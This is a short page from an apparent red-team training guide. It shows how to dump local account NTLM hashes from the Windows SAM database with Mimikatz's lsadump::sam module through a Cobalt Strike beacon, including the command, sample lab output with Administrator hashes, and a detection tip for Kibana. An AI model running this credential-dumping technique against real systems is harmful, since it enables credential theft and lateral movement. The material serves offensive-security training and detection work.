Security Account Manager

The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only. These can be extracted with the lsadump::sam Mimikatz module. If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.

This command requires elevated privileges.

beacon> mimikatz !lsadump::sam
	
Domain : WKSTN-2
SysKey : b9dc7de8b1972237bbbd7f82d970f79a
Local SID : S-1-5-21-2281971671-4135076198-2136761646

SAMKey : b0664279732686cfbb4b788c078fea82

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: fc525c9683e8fe067095ba2ddc971889
    lm  - 0: 91b6e660bcac036ae7ab67a3d383bc82
    ntlm- 0: fc525c9683e8fe067095ba2ddc971889

OPSEC This module will open a handle to the SAM registry hive. Use the "Suspicious SAM Hive Handle" saved search in Kibana to see them.

PreviousKerberos Encryption Keys NextDomain Cached Credentials

Last updated 2 years ago